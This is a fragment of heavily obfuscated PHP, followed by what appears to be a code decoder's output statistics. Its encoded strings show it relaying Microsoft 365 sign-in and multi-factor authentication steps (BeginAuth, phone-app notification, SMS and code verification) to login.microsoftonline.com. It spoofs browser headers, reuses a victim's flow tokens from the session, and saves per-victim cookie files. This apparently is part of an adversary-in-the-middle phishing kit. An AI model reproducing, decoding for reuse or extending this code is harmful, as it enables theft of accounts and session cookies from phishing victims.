            "\150\164\x74\160\x73\x3a\x2f\57\154\x6f\147\x69\x6e\x2e\155\x69\143\162\x6f\x73\x6f\x66\x74\157\156\154\x69\156\x65\56\143\157\155\57\x63\157\x6d\x6d\x6f\156\57\x53\101\x53\x2f\102\145\147\151\156\x41\x75\164\x68",
            [
                "\x68\x65\x61\x64\145\x72\x73" => [
                    "\x41\x63\143\145\x70\x74" =>
                        "\141\x70\160\154\151\143\x61\x74\151\157\x6e\x2f\152\163\157\x6e",
                    "\x41\x63\143\145\160\164\x2d\114\x61\156\147\165\141\147\145" =>
                        "\x65\x6e\55\125\123\x2c\145\x6e\73\x71\75\60\x2e\71",
                    "\x43\157\156\x6e\x65\143\x74\151\157\x6e" =>
                        "\x6b\x65\145\x70\55\141\x6c\x69\166\145",
                    "\103\x6f\156\x74\145\x6e\x74\x2d\x54\171\160\145" =>
                        "\141\160\160\154\x69\x63\141\x74\x69\x6f\156\x2f\x6a\163\x6f\156\x3b\40\x63\x68\141\162\x73\145\164\75\x55\x54\x46\55\70",
                    "\103\157\x6f\153\151\x65" => $this->gencook(
                        $this->A20d7 .
                            "\x2f\143\157\x6f\x6b\x69\145\137" .
                            $this->Fa736 .
                            "\56\x74\x78\164"
                    ),
                    "\x4f\162\151\147\x69\x6e" =>
                        "\x68\164\x74\160\x73\72\57\x2f\154\x6f\147\151\156\56\x6d\151\x63\x72\x6f\x73\157\x66\x74\x6f\x6e\154\x69\x6e\x65\x2e\x63\x6f\x6d",
                    "\x52\145\146\145\162\x65\x72" =>
                        "\x68\x74\x74\160\163\72\x2f\x2f\154\157\147\x69\156\56\155\151\x63\162\x6f\163\157\146\x74\157\x6e\154\151\x6e\145\x2e\143\157\155\57\143\x6f\155\x6d\157\156\57\x6c\157\x67\x69\x6e",
                    "\123\x65\x63\55\106\x65\x74\143\150\55\104\x65\x73\164" =>
                        "\x65\x6d\x70\x74\x79",
                    "\123\145\x63\x2d\x46\x65\164\143\x68\x2d\x4d\x6f\144\145" =>
                        "\x63\x6f\x72\x73",
                    "\123\145\143\55\x46\145\164\x63\x68\55\123\151\164\x65" =>
                        "\x73\x61\x6d\145\x2d\x6f\162\x69\147\151\x6e",
                    "\125\163\x65\x72\x2d\101\147\145\156\x74" =>
                        "\x4d\157\x7a\x69\x6c\x6c\x61\57\x35\56\x30\x20\x28\127\151\x6e\x64\x6f\167\163\x20\116\124\40\61\x30\x2e\x30\73\x20\127\151\156\x36\64\73\x20\170\x36\64\x29\40\x41\160\x70\x6c\x65\x57\145\142\x4b\151\x74\57\x35\63\67\56\x33\x36\40\50\x4b\110\x54\x4d\x4c\54\40\154\151\x6b\x65\40\107\x65\x63\153\x6f\51\x20\103\x68\162\x6f\x6d\145\x2f\61\x32\x38\x2e\x30\56\60\x2e\x30\x20\123\141\x66\x61\162\x69\57\65\63\x37\56\63\66",
                    "\x43\141\x6e\x61\x72\171" =>
                        $_SESSION[
                            "\x69\156\146\x6f\x5f\x74\x6f\153\145\x6e\137\62\x66\141"
                        ]["\x61\x70\x69\137\143\141\156\x61\162\171"],
                    "\103\154\x69\x65\156\164\55\122\145\161\165\x65\163\164\x2d\111\x64" =>
                        $_SESSION[
                            "\x69\x6e\x66\x6f\137\164\157\153\x65\x6e\x5f\x32\146\x61"
                        ]["\162\x65\161\x75\x65\x73\x74\x5f\151\144"],
                    "\x48\x70\x67\141\x63\x74" => "\x32\60\60\60",
                    "\110\160\x67\151\x64" => "\61\x31\x31\64",
                    "\x48\160\147\x72\145\x71\x75\145\x73\164\151\144" =>
                        $_SESSION[
                            "\x69\x6e\146\157\x5f\x74\157\x6b\145\x6e\137\x32\146\141"
                        ]["\x73\145\x73\x73\151\x6f\x6e\137\x69\x64"],
                    "\123\145\143\x2d\x43\150\x2d\x55\141" =>
                        "\42\103\x68\162\x6f\x6d\x69\x75\x6d\42\73\x76\75\x22\61\x32\70\x22\54\40\x22\116\157\164\x3b\101\x3d\102\x72\x61\156\x64\x22\73\166\x3d\42\x32\x34\x22\x2c\40\42\x47\x6f\x6f\147\x6c\x65\x20\103\150\x72\x6f\155\145\x22\73\x76\x3d\x22\x31\62\70\42",
                    "\123\x65\x63\x2d\x43\x68\x2d\x55\x61\x2d\115\157\x62\151\154\145" =>
                        "\77\x30",
                    "\123\145\143\x2d\x43\150\x2d\125\141\55\120\x6c\x61\x74\146\157\162\x6d" =>
                        "\42\127\x69\156\x64\157\167\163\42",
                ],
                "\152\163\157\156" => [
                    "\x41\165\164\x68\115\145\164\x68\157\x64\x49\x64" => $de1ca,
                    "\x4d\x65\164\x68\x6f\144" =>
                        "\102\x65\147\x69\156\101\x75\164\150",
                    "\143\164\170" =>
                        $_SESSION[
                            "\x69\x6e\x66\x6f\137\164\x6f\153\x65\156\137\62\146\141"
                        ]["\163\103\x74\170"],
                    "\146\154\x6f\167\124\157\x6b\x65\156" =>
                        $_SESSION[
                            "\151\x6e\146\157\x5f\164\157\153\145\156\137\x32\146\x61"
                        ]["\x73\x46\x54"],
                ],
            ]
        );
        goto b7f59;
        Ffcd2:
        E65d0:
        goto eebb5;
        Fc905:
        $this->ad1e3 =
            $_SESSION[
                "\151\x6e\146\x6f\x5f\164\x6f\x6b\x65\x6e\137\x32\x66\141"
            ]["\162\x65\x71\165\x65\163\x74\x5f\151\144"];
        goto D6b85;
        a69f6:
        D57ff:
        goto e9075;
        cd671:
        $this->status["\x65\156\x74\162\157\160\x79"] =
            $b0338["\105\156\164\x72\157\x70\171"];
        goto Fc75a;
        D6b85:
        if (!($C19e5 == "\166\x65\162\x69\146\x79\137\141\x70\x70")) {
            goto fd893;
        }
        goto cd671;
        cb448:
        $this->fac50 = $b0338["\x46\154\157\x77\124\x6f\153\145\x6e"];
        goto c54fb;
        A6ed6:
        $b0338 = json_decode($A75e0, true);
        goto cb448;
        d4355:
        if ($C19e5 == "\x76\145\x72\x69\146\x79\137\x61\x70\x70") {
            goto E65d0;
        }
        goto a450a;
        ca85e:
        $this->B5b07 =
            $_SESSION[
                "\151\x6e\146\x6f\137\164\x6f\153\145\156\137\62\x66\x61"
            ]["\143\x61\156\x61\x72\171"];
        goto c3b48;
        C64fd:
        $A75e0 = $Accd6->getBody()->getContents();
        goto F3090;
        b2159:
        $this->status[
            "\x32\x66\141\x5f\x62\x65\147\151\156\x61\165\164\x68"
        ] = false;
        goto e3e0c;
        Abc1e:
        if ($C19e5 == "\x76\x65\x72\x69\x66\x79\x5f\x63\157\x64\x65") {
            goto D8b9b;
        }
        goto d4355;
        ee76d:
        $this->status = $_SESSION["\x73\x74\141\164\165\163"];
        goto a207b;
        f3960:
        Ce695:
        goto A9fc5;
        c3b48:
        $this->E423c = $b0338["\x53\145\x73\163\x69\157\156\111\x64"];
        goto Fc905;
        a450a:
        if (!($C19e5 == "\166\145\162\151\x66\x79\x5f\163\155\x73")) {
            goto Ce695;
        }
        goto d4e30;
        b7f59:
        $F16be->save(
            $this->A20d7 .
                "\x2f\143\157\x6f\153\x69\x65\137" .
                $this->Fa736 .
                "\x2e\164\x78\x74"
        );
        goto C64fd;
        d6e87:
        $F16be = new FileCookieJar(
            $this->A20d7 .
                "\57\143\x6f\157\153\151\x65\x5f" .
                $this->Fa736 .
                "\x2e\x74\x78\164",
            true
        );
        goto E72f9;
        eebb5:
        $de1ca =
            "\x50\x68\x6f\x6e\x65\101\160\x70\x4e\x6f\x74\x69\146\151\143\141\164\151\x6f\x6e";
        goto a69f6;
        dcc18:
    }
}

Function Calls

None

Variables

None

Stats

MD5 d3b1e73e28aa30fa8f7247d8da6271ee
Eval Count 0
Decode Time 183 ms